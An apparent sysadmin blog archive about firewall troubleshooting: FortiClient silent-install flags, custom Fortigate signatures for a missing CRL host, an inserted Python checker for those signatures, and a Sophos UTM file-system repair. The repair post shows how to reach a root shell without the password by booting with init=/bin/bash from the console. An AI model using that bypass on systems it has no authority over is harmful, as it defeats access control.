Or jump direct to the TLS 1.3 setting with edge://flags/#enable-tls13-early-data

Open following URL / Test Website to see what's supported:

https://browserleaks.com/ssl

https://news.sophos.com/en-us/2020/08/18/report-firewall-best-practices-to-block-ransomware/

https://www.fortinet.com/blog/business-and-technology/tls-is-here-what-this-means-for-you

https://www.f5.com/c/landing/encrypted-threats/article/tls-1-3-are-you-ready-for-the-update

https://community.checkpoint.com/t5/General-Topics/CheckPoint-TLS-1-3-support-When/td-p/63672

https://www.cisco.com/c/en/us/td/docs/security/firepower/630/configuration/guide/fpmc-config-guide-v63/understanding_traffic_decryption.html

https://www.sonicwall.com/support/knowledge-base/ssl-tls-protocols-supported-by-sonicos-matrix/170615123553371/

Read more:

https://devblogs.microsoft.com/premier-developer/microsoft-tls-1-3-support-reference/

https://www.imperial.ac.uk/media/imperial-college/faculty-of-engineering/computing/public/1819-pg-projects/Detecting-Malware-in-TLS-Traf%EF%AC%81c.pdf

https://blog.cloudflare.com/tls-1-3-overview-and-q-and-a/

https://www.heise.de/security/meldung/Verschluesselung-TLS-1-3-Fauxpas-gefaehrdet-Embedded-Systeme-mit-wolfSSL-4883741.html

https://www.heise.de/hintergrund/Was-TLS-1-3-ist-und-wie-Sie-davon-profitieren-4248740.html

https://www.sans.org/reading-room/whitepapers/vpns/paper/39715

https://nakedsecurity.sophos.com/2020/02/18/malware-and-https-a-growing-love-affair/

Tags:

Hotfixes / Updates | W10 | SECURITY | FW Fortigate | FW Sophos

Fortigate Forticlient silent INSTALLLEVEL 1 does not work on 6.X versions, how to solve

by butsch 2. April 2019 14:49

Problem: the Forticlient silent option to select the different modules to install does not work as before with Forticlient 6.X up to 6.0.5 (FortiClientSetup_6.0.5.0209_x64)

Problem: you see an empty Forticlient window when you open it

Explanation:

Until now there were two options for the Forticlient:

  • Forti Configurator (a tool in which you could pick the options and also pass in a CONFIG file; at the end it produced an MSI)
  • The Windows Installer option INSTALLLEVEL (with this you could tell Forticlient, up to 5.9.X, what you want: SSLVPN/VPN/antivirus etc.)

The Configurator is now only available on the Fortinet Developer Network. To get at the file there you MUST name two Fortinet employees as references.

To get the Configurator you have to open a developer account with Fortinet, and to do that you have to get the approval of TWO Fortinet employees (Fortinet e-mail addresses). That's simply because they don't want customers to modify the default install; they want them to use the ONLINE installer so everybody tries their antivirus and patch module. Before, you could download the Forticlient Configurator for free under the Forticlient support download section.

There are also other nice things there, like the VPN automation scripts and SSL VPN command-line tools. I am sure a lot of Fortinet customers would like to use those and don't even know they exist, and switch to VPN technology from Microsoft instead: https://docs.microsoft.com/en-us/windows-server/remote/remote-access/vpn/always-on-vpn/always-on-vpn-technology-overview

This thread shows what happens when you use INSTALLLEVEL=1 (as worked before with Forticlient 5.X)

https://forum.fortinet.com/tm.aspx?m=165279

https://docs.fortinet.com/document/forticlient/6.0.2/configurator-tool/823336/use-forticlient-configurator-tool-tool-for-windows

Forticonfigurator:

Nice ;-.)

Solution:

Use INSTALLLEVEL 3 instead of 1

msiexec.exe /i FortiClientSetup_6.0.5.0209_x64\forticlient.msi /quiet INSTALLLEVEL=3

The MSI package:

VPN, SSLVPN, SSO is fine for most enterprise users.

We don't see the NAC option in the GUI even if we choose it with option 3 > We don't want that, so INSTALLLEVEL 1 would be the choice, but that DOES NOT work as mentioned.

Here is the reason Fortigate makes this so complex: they want to sell EMS, which can be used to deploy Forticlient.

Tags:

SECURITY | FW Fortigate

Missing entry in Fortigate Application Filter ROOT.CERTIFICATE.URL and OCSP source of W10 Setup failing

by butsch 31. October 2018 21:35

Fortigate application filter certificate entry wrong/missing: a sample with an important laptop driver (W10 deployment fails because of the signed driver's revocation lookup)

OR HOW a small missing ENTRY in a FORTIGATE FIREWALL IPS/APP filter can ruin your Windows 10 OS deployment work.

Reason: a missing entry in the Fortigate application filter "ROOT.CERTIFICATE.URL" and "OCSP" is the source of the failing deployment

Windows 10 deployment with commercial deployment products (this includes HP client hardware, Microsoft SCCM, LANDesk or Ivanti Frontrange).

During the unattended phase, the driver for mass storage or the NIC does a certificate revocation lookup. However, the URL mentioned here as a sample, pki.infineon.com (hardware driver URL, CRL FQDN), is missing from the FortiGuard definitions. Thus the Fortigate blocks the access to the WAN. Since this is an early setup phase of W10, group policy or special GPOs do not apply at that moment.

Fortigate has already missed several PKI URLs in the last few months, confirmed by ticket, resulting in large trouble and delays on client and server OS for customers who route their client or server traffic through a web proxy and, for security reasons, do not want to route computer-account traffic to the proxy by default.

Why this is so important, and why this generates a lot of work and trouble for OS deployment teams.

The normal way in larger companies is that all outgoing traffic from the client VLAN goes to the firewall, which blocks it. All web/application/SOCKS traffic that should go outside goes to a proxy / web filter.

In the early phase of deployment those options are not yet set, and normally not needed. However, if the driver is older than the expiration of the code-signing certificate, W7/W10 will check the certificate revocation list from WAN/Internet. If that fails, it may refuse to integrate the driver in Windows PE or the early Windows Setup phase. If, for example, this is a driver which handles the NIC (network) or mass storage (disk), the deployment can't get through this early process.

Workaround:

URL we need open in our sample: pki.infineon.com; its absence causes a complete enterprise deployment system to fail

Sample from Fortigate for other certs they missed:

F-SBID( --name "Root.Certificate.URL_Custom"; --protocol tcp; --app_cat 17; --service HTTP; --flow from_client; --pcre "/(crl\.microsoft\.com|\.omniroot\.com|\.verisign\.com|\.symcb\.com|\.symcd\.com|\.verisign\.net|\.geotrust\.com|\.entrust\.net|\.public-trust\.com|\.globalsign\.|\.digicert\.com|crl\.startcom\.|crl\.cnnic\.cn|crl\.identrust\.com|crl\.thawte\.com|crlsl\.wosign\.com|www\.d\-trust\.net)/"; --context host; --weight 15; )

In our case:

F-SBID( --name "Root.Certificate.pki.infineon.com"; --protocol tcp; --app_cat 17; --service HTTP; --flow from_client; --pcre "/(pki\.infineon\.com)/"; --context host; --weight 15; )
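As an added example in Python (not from the post and not Fortinet code), this parses F-SBID lines like the two above, compiles their --pcre option with Python's re, and reports which CRL/OCSP hosts seen in deployment logs would still be matched by no signature, which is exactly the gap pki.infineon.com fell into. The sample host list is constructed; crl.example-oem.test is a made-up name.

```python
import re

# The two custom application-control signatures from the post, each on one line as it
# must appear on the firewall.
SIGNATURES = [
    r'F-SBID( --name "Root.Certificate.URL_Custom"; --protocol tcp; --app_cat 17; --service HTTP; --flow from_client; --pcre "/(crl\.microsoft\.com|\.omniroot\.com|\.verisign\.com|\.symcb\.com|\.symcd\.com|\.verisign\.net|\.geotrust\.com|\.entrust\.net|\.public-trust\.com|\.globalsign\.|\.digicert\.com|crl\.startcom\.|crl\.cnnic\.cn|crl\.identrust\.com|crl\.thawte\.com|crlsl\.wosign\.com|www\.d\-trust\.net)/"; --context host; --weight 15; )',
    r'F-SBID( --name "Root.Certificate.pki.infineon.com"; --protocol tcp; --app_cat 17; --service HTTP; --flow from_client; --pcre "/(pki\.infineon\.com)/"; --context host; --weight 15; )',
]

# One "--option value;" pair; a value is either a double-quoted string (backslash
# escapes allowed, as in the pcre) or a bare token up to the next semicolon.
_OPTION_RE = re.compile(r'--(\w+)\s+("(?:[^"\\]|\\.)*"|[^;]+);')


def parse_fsbid(signature):
    """Turn one F-SBID( ... ) line into {option: value}; quoted values lose their quotes."""
    body = signature.strip()
    if not (body.startswith("F-SBID(") and body.endswith(")")):
        raise ValueError("not an F-SBID signature")
    options = {}
    for key, value in _OPTION_RE.findall(body[len("F-SBID("):-1]):
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        options[key] = value
    return options


def compile_pcre(value):
    """Compile a /pattern/flags value from the --pcre option with Python's re."""
    match = re.fullmatch(r"/(.*)/([a-zA-Z]*)", value, re.DOTALL)
    if not match:
        raise ValueError("pcre value must look like /pattern/flags: %r" % value)
    flags = re.IGNORECASE if "i" in match.group(2) else 0
    return re.compile(match.group(1), flags)


def host_coverage(signatures, hosts):
    """Map each host to the names of the host-context signatures whose pcre matches it."""
    compiled = []
    for options in (parse_fsbid(s) for s in signatures):
        if options.get("context") == "host" and "pcre" in options:
            compiled.append((options["name"], compile_pcre(options["pcre"])))
    return {host: [name for name, rx in compiled if rx.search(host)] for host in hosts}


def uncovered_hosts(signatures, hosts):
    """Hosts (e.g. CRL/OCSP names seen in deployment logs) that no signature would match."""
    return [host for host, names in host_coverage(signatures, hosts).items() if not names]


# Constructed sample of CRL/OCSP hosts a deployment might contact; the last one is made up.
SAMPLE_HOSTS = [
    "crl.microsoft.com",
    "ocsp.digicert.com",
    "www.d-trust.net",
    "pki.infineon.com",
    "crl.example-oem.test",
]

if __name__ == "__main__":
    for host, names in host_coverage(SIGNATURES, SAMPLE_HOSTS).items():
        print(host, "->", names or "NOT COVERED")
```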

Please also see:

Butsch.ch | The certificate is invalid for exchange server usage Exchange 2010 SAN/UC

https://www.butsch.ch/post/The-certificate-is-invalid-for-exchange-server-usage-Exchange-2010-SANUC

So you understand that this is a problem which exists across all firewall vendors:

https://support.symantec.com/en_US/article.HOWTO9584.html

Symantec: About the Install Readiness Check for Certificate Revocation List access

https://success.trendmicro.com/solution/1058226

TREND MICRO: After upgrading OfficeScan, users complained that the server started to rename all files in the OfficeClient directory to "_invalid".
Below is a sample list of files in the D:\app\Trend Micro\OfficeScan\PCCSRV\Admin directory:

Checkpoint:

https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk108202

If there is no Internet connection, then CRL fetch and intermediate CA fetch will fail (this will be logged). The inspection will take place; however, URL-based or Category-based bypassing will not work.

Note: The CRL verifications are performed in the background asynchronously while matching the security policy (this mimics the behavior of the major web browsers).

Untrusted certificates and lack of CRLs can be configured as reasons to drop the connection.

Mcafee:
https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25504/en_US/epo_530_pg_0-00_en-us.pdf

 

 

 

Tags:

Deployment | Microsoft SCCM/MEM/MDT | Scripting | Ivanti Frontrange Enteo | W10 | M365/AZURE | SECURITY | FW Fortigate | FW Sophos | Mcafee ENS, EPO, DLP, TIE, ATD, VSE, MSME

SOPHOS UTM 9.4 VMware on ESXi does not start after crash of ESX or Storage

by butsch 11. June 2018 00:08

File system inconsistency - cannot run fsck

  • The console hangs at "Press F2" with a white screen; you can't log on or ping the machine
  • You can't connect with SSH
  • You can't access the machine on port 4444
  • You did NOT move (copy) the machine, NOR did you change anything on the NIC or MAC
  • You probably had a crash on the ESXi host, the storage or the disk system itself
  • You assume that Linux file systems are robust and think they can't crash (looks like not…)

If you try the Rescue boot option you should log on ONLY as root. However, you are a Windows user and always log on with admin and password through the web console on port 4444. I am absolutely sure there is documentation on this, and if you have set it up and read the manual like Sophos wants you to, then you have that password.

Here is how to repair the file system with almost no TUX knowledge and without having the root password! (Kind of strange, but well, you need physical access or console access.) So…

Error

 

Reboot the UTM machine in ESXi-console

 

Press ESC

Type "e" on the keyboard once (nothing else)

Choose the option which looks like this (similar)

If you are in the ESXi console, append the following to the command line which is displayed now (at the end of the existing command), right behind *******silent:

init=/bin/bash

If you search CHARS on non us-keyboard:

On GERMAN or SWISS GERMAN layouts the "=" is right under the F10 key on non-US keyboards! The "/" is on the numeric keypad.

 

PRESS "ENTER"

PRESS "b" to boot with the modified boot setting

When the system stops it will stay at the CLI.

Run the CLI command

fsck /dev/sda6

or wherever your corrupt file system is (it will show you in the errors, as in the sample below)

Answer "y" to every question it asks

Comment from a Windows senior system engineer > Nobody understands what it says. Not even the guy who coded it, we guess…

Reboot the system with CTRL-ALT-DEL from ESXi (Send command)

Here is how to reset Sophos passwords. We ONLY used steps 1-10 for the repair of the file system.

https://community.sophos.com/kb/en-us/115346#How%20to%20reset%20all%20passwords

 

 

 

 

Tags:

SECURITY | FW Sophos

SOPHOS: Unable to SSH after Update to 9.4 latest Release 9.404-5

by butsch 20. July 2016 03:35

You did everything right as described below but are unable to log on:

http://www.butsch.ch/post/Sophos-UTM-9314-13-Data-Disk-is-filling-up.aspx

Error: Network error:Software caused connection abort

Solution: download the latest version of PuTTY and it will work again

http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

 

 

Tags:

SECURITY | FW Sophos


